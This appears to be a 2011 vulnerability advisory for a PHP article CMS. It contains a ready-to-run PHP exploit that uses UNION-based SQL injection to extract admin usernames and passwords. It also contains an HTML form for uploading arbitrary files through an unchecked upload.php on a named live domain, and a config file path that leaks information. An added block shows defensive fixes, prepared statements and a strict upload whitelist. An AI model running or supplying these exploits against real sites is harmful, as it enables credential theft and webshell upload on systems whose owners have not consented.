Vulnerability author: 黑小子
Published: 2011-09-20
Vulnerability type: SQL injection
Brief description:
[pre]
// pageArt.php
// ... omitted
$column = $_POST["column"];   // taken straight from the request, no validation
$rownum = $_POST["rownum"];
$sql = " select id,title,addtime from lpc_article where column_id=".$column;   // concatenated into the query
// ... omitted
// other similar files ... omitted
[/pre]
Exp:
[pre]
<?php
error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
 Sql injection Vul Exploit
 Exp :黑小子 cfking
 Home: www.heixiaozi.com www.webvul.com
 2011.09.20
+---------------------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
Usage:   php '.$argv[0].' host /path
Example: php '.$argv[0].' www.heixiaozi.com test
');
    die();
}
ob_start();
$host = $argv[1];
$path = $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fwrite($sock, "GET /article.php?id=255%20and%2201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n");
fwrite($sock, "Connection: keep-alive\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 1024))) $headers .= "$str\n";
$body = "";
while (!feof($sock)) $body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);
if (strpos($body, 'cfkings90sec') !== false) {
    preg_match('/cfkings90sec~(.*?)~1/', $body, $arr);
    $result = explode("-", $arr[1]);
    print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");
} else {
    print_r("Exploit Failed! \n");
}
?>
[/pre]
File upload:
Vulnerable file: admin/column/upload.php
[pre]
// admin/article/upload.php
$upload_dir = '../../uploads/';
$file_path = $upload_dir . $_FILES['myfile']['name'];   // client-supplied file name used as-is
$MAX_SIZE = 20000000;
echo $_POST['buttoninfo'];
......
// the checks below only print a message; none of them stops the upload
if($_FILES['myfile']['size']>$MAX_SIZE)
    echo "上传的文件大小超过了规定大小";
if($_FILES['myfile']['size'] == 0)
    echo "请选择上传的文件";
if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path))
    echo "复制文件失败,请重新上传";
[/pre]
Neither file applies any restriction at all!
Exp:
[pre]
<meta http-equiv="Content-Type" content="text/html;charset=gb2312" />
<form enctype="multipart/form-data" action="http://www.yunsec.net/admin/column/upload.php" method="post">
<p>After uploading, the file sits under the site root at http://www.yunsec.net/uploads/&lt;name of the uploaded file&gt;</p>
<input type="file" name="myfile" size="20">
<input type="submit" value="Upload">
</form>
[/pre]
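For contrast, the fixes a maintainer would apply to the two snippets above (pageArt.php and upload.php), as an added example that is not part of this advisory or the affected product's code; it assumes a mysqli connection in $db, keeps the page's table and field names, and still relies on the admin session check that both handlers should sit behind.

```php
<?php
// Hardened versions of the two vulnerable snippets from the advisory (added example).
// Assumptions: $db is an open mysqli connection; table/field names as on the page.

// pageArt.php: column_id is numeric, so validate it and bind it as an integer
// instead of concatenating $_POST["column"] into the SQL string.
function fetchArticles(mysqli $db, array $post): array
{
    $column = filter_var($post['column'] ?? '', FILTER_VALIDATE_INT);
    if ($column === false) {
        return []; // anything that is not an integer is rejected, never interpolated
    }
    $stmt = $db->prepare('SELECT id, title, addtime FROM lpc_article WHERE column_id = ?');
    $stmt->bind_param('i', $column);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// admin/column/upload.php: the original only echoes a message on bad input and
// then moves the file anyway, under the client-chosen name. Here every check is
// fatal, the type is whitelisted by real content, and the name is server-generated.
function storeUpload(array $file, string $uploadDir, int $maxSize = 20000000): ?string
{
    $allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;                                   // nothing uploaded, or PHP reported an error
    }
    if ($file['size'] === 0 || $file['size'] > $maxSize) {
        return null;                                   // size limits are enforced, not just announced
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$ext]) || $allowed[$ext] !== $mime) {
        return null;                                   // extension and detected content must agree
    }
    // random file name: the user-supplied name never reaches the filesystem,
    // and $uploadDir should be a directory the web server does not execute scripts from
    $target = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    return $target;
}
```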
Information disclosure:
http://www.yunsec.net/admin/lib/db/config.xml